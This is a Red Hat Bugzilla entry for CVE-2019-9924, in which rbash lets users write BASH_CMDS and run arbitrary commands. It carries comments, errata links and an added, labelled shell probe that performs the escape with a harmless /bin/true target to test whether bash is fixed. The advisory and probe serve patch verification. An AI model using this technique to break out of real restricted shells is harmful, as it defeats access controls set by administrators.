Bug 1691774 (CVE-2019-9924)

Summary: CVE-2019-9924 bash: BASH_CMD is writable in restricted bash shells
Product: [Other] Security Response
Reporter: Dhananjay Arunesh <darunesh>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
QA Contact:
Severity: medium
Docs Contact:
Priority: medium
Version: unspecified
CC: admiller, bmcclain, dblechte, dfediuck, eedri, gsuckevi, kasal, kdudka, markdenihan, mgoldboi, michal.skrivanek, sbonazzo, sherold, svashisht, yturgema
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2020-03-31 22:33:46 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 1691775, 1693181, 1829558, 1837053, 1837054    
Bug Blocks: 1691776    

Description Dhananjay Arunesh 2019-03-22 13:48:59 UTC
rbash in Bash before 4.4-beta2 did not prevent the shell user from modifying BASH_CMDS, thus allowing the user to execute any command with the permissions of the shell.

Reference:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1803441

Upstream commit:
http://git.savannah.gnu.org/cgit/bash.git/commit/CHANGES?h=bash-4.4-testing&id=955543877583837c85470f7fb8a97b7aa8d45e6c

Comment 1 Dhananjay Arunesh 2019-03-22 13:49:55 UTC
Created bash tracking bugs for this issue:

Affects: fedora-all [bug 1691775]

Comment 4 Riccardo Schirone 2019-03-27 09:57:40 UTC
An attacker can execute binaries with / in their names even when bash is used as a Restricted Shell, by abusing the environment variable BASH_CMDS.
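The bypass described in the report and in the comment above, as an added probe script (not part of the bug report or of bash itself): restricted bash refuses any command name containing a slash, but the command hash table is exposed as the BASH_CMDS associative array, and an rbash that lets the user write BASH_CMDS[name]=/path will then run /path when the slash-free "name" is typed. The script checks two controls that hold on every bash (the slash restriction, and the hash trick working in an unrestricted shell) and then runs the same trick under bash -r to report whether the installed bash is vulnerable or fixed. The hashed name "cve_probe" is an arbitrary choice for this example, and /bin/true is assumed to exist.

```shell
#!/usr/bin/env bash
# Added example, not code from the bug report or from bash: probe the
# installed bash for CVE-2019-9924 (BASH_CMDS writable under bash -r).
# "cve_probe" is an arbitrary hashed command name chosen for this example;
# /bin/true is assumed to exist.

# Control 1: restricted mode rejects a command name containing a slash.
# Returns 0 when the restriction holds (expected on every bash build).
slash_command_is_blocked() {
    ! bash -r -c '/bin/true' 2>/dev/null
}

# Control 2: in an unrestricted bash, seeding the hash table through
# BASH_CMDS is legitimate, so the slash-free name "cve_probe" runs /bin/true.
# Returns 0 on every bash; this is the mechanism rbash has to fence off.
bash_cmds_hash_works_unrestricted() {
    bash -c 'BASH_CMDS[cve_probe]=/bin/true; cve_probe' 2>/dev/null
}

# The probe: the same trick under bash -r. A vulnerable rbash (before
# 4.4-beta2) accepts the assignment and "cve_probe" runs /bin/true, so the
# command exits 0. A fixed rbash rejects the assignment as a restricted
# operation, "cve_probe" is then not found, and the command exits non-zero.
# Prints "vulnerable" or "fixed".
bash_cmds_probe() {
    if bash -r -c 'BASH_CMDS[cve_probe]=/bin/true; cve_probe' 2>/dev/null; then
        echo vulnerable
    else
        echo fixed
    fi
}

# Human-readable summary when the script is run directly.
rbash_report() {
    printf 'bash version: %s\n' "$(bash -c 'echo "$BASH_VERSION"')"
    if slash_command_is_blocked; then
        echo 'bash -r blocks slash in command names: yes'
    else
        echo 'bash -r blocks slash in command names: NO (restricted mode not compiled in?)'
    fi
    printf 'BASH_CMDS writable under bash -r: %s\n' "$(bash_cmds_probe)"
}

rbash_report
```

The probe only tells you whether this particular bypass is closed; as the Red Hat statement later in this bug notes, rbash has other known escapes, so a "fixed" result is not evidence that a restricted-shell deployment is safe.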

Comment 12 Mark Denihan 2020-01-27 14:56:48 UTC
Is there any plan to have this moderate issue patched on RHEL7? If so is there any ETA on that patch's availability?

Comment 13 errata-xmlrpc 2020-03-31 19:23:48 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2020:1113 https://access.redhat.com/errata/RHSA-2020:1113

Comment 14 Product Security DevOps Team 2020-03-31 22:33:46 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2019-9924

Comment 16 Riccardo Schirone 2020-05-04 08:58:06 UTC
Statement:

Impact of the flaw set to Moderate as the restricted shell shall not be used as a security feature alone, as it is very hard to configure it properly and several bypasses exist for it.

This issue did not affect the versions of bash as shipped with Red Hat Enterprise Linux 5, as they did not include support for the BASH_CMDS environment variable.

Red Hat Virtualization Hypervisor and Management Appliance were affected by this issue, but do not use the restricted bash shell in a way that would be exposed to attackers. Future updates may address this issue.

Comment 19 errata-xmlrpc 2020-08-18 12:49:38 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.6 Extended Update Support

Via RHSA-2020:3474 https://access.redhat.com/errata/RHSA-2020:3474

Comment 20 errata-xmlrpc 2020-09-01 16:31:25 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.7 Extended Update Support

Via RHSA-2020:3592 https://access.redhat.com/errata/RHSA-2020:3592

Comment 22 errata-xmlrpc 2020-09-22 11:38:09 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.4 Advanced Update Support
  Red Hat Enterprise Linux 7.4 Telco Extended Update Support
  Red Hat Enterprise Linux 7.4 Update Services for SAP Solutions

Via RHSA-2020:3803 https://access.redhat.com/errata/RHSA-2020:3803